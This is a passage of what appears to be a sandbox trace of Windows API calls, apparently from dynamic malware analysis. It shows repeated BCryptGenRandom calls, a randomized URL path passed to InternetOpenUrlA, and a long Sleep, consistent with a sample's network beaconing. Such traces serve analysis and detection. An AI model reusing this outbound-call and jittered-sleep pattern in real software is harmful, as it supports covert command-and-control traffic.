hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0273.335] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.338] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a16fa3, cbBuffer=0x14, dwFlags=0x2 | out: pbBuffer=0x3a16fa3) returned 0x0 [0273.338] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.338] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.338] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.338] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0273.339] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.339] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.339] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.339] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.339] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.340] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.340] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.340] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.340] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.340] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0273.340] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.340] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.341] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.341] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0273.341] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.341] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0273.341] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.341] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.341] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.341] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0273.342] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.342] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.342] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.342] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.342] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.342] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0273.342] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.342] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a16fb7, cbBuffer=0x26, dwFlags=0x2 | out: pbBuffer=0x3a16fb7) returned 0x0 [0273.342] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.342] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0273.343] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.343] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.343] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.343] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0273.343] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.343] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.344] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.344] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0273.344] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.344] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.344] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.344] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0273.344] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.344] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0273.345] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.345] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0273.345] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.345] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.345] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.345] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.345] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.345] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.345] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.345] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0273.346] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.346] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0273.346] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.346] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.346] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.346] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.346] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.346] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0273.347] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.347] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.347] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.347] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.347] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.347] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0273.348] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.348] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.348] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.348] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0273.348] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.348] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.348] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.348] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0273.349] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.349] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0273.349] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.349] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.349] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.349] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.350] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.350] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.350] GetProcessHeap () returned 0x440000 [0273.350] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x473b90 [0273.350] lstrcpyA (in: lpString1=0x473b90, lpString2="\x80o¡\x03" | out: lpString1="\x80o¡\x03") returned="\x80o¡\x03" [0273.350] lstrcatA (in: lpString1="\x80o¡\x03", lpString2="/sy9orQsS3vhuKyt7RxF1l4ilhtzthMw5i/fIuGdcbw2j0K3bVC2io/D8q3d5Tr7oc41rW3xl73zw6giqp9b8dR09uyh/" | out: lpString1="\x80o¡\x03/sy9orQsS3vhuKyt7RxF1l4ilhtzthMw5i/fIuGdcbw2j0K3bVC2io/D8q3d5Tr7oc41rW3xl73zw6giqp9b8dR09uyh/") returned="\x80o¡\x03/sy9orQsS3vhuKyt7RxF1l4ilhtzthMw5i/fIuGdcbw2j0K3bVC2io/D8q3d5Tr7oc41rW3xl73zw6giqp9b8dR09uyh/" [0273.350] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0273.350] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x80o¡\x03/sy9orQsS3vhuKyt7RxF1l4ilhtzthMw5i/fIuGdcbw2j0K3bVC2io/D8q3d5Tr7oc41rW3xl73zw6giqp9b8dR09uyh/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0273.519] GetProcessHeap () returned 0x440000 [0273.519] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x473b90 | out: hHeap=0x440000) returned 1 [0273.519] GetProcessHeap () returned 0x440000 [0273.519] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a16f80 | out: hHeap=0x440000) returned 1 [0273.519] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0273.520] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0273.520] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.520] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0273.520] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0273.520] Sleep (dwMilliseconds=0x17fd1) [0273.677] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.677] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0273.677] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.677] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0273.677] GetProcessHeap () returned 0x440000 [0273.678] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x95) returned 0x3a16f80 [0273.678] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.678] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0273.678] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.678] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a16f81, cbBuffer=0x2a, dwFlags=0x2 | out: pbBuffer=0x3a16f81) returned 0x0 [0273.678] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.678] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.678] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.678] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0273.679] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.679] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0273.679] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.679] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.679] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.680] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.680] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.680] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0273.680] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.680] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.680] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.680] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.680] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.681] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.681] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.681] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0273.681] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.681] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.682] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.682] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.682] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.682] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0273.682] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.682] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.682] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.682] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.683] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.683] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.683] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.683] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0273.683] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.683] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0273.683] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.683] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0273.684] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.684] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0273.684] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.684] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.684] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.684] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.684] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.684] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.685] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.685] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0273.685] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.685] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.685] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.685] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.685] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.685] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.686] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.686] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.686] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.686] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.686] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.686] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0273.686] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.686] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.687] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.687] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.687] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.687] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0273.687] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.687] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.687] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.687] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0273.687] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.688] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a16fab, cbBuffer=0x11, dwFlags=0x2 | out: pbBuffer=0x3a16fab) returned 0x0 [0273.688] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.688] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0273.688] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.688] BCryptGenRandom (in: 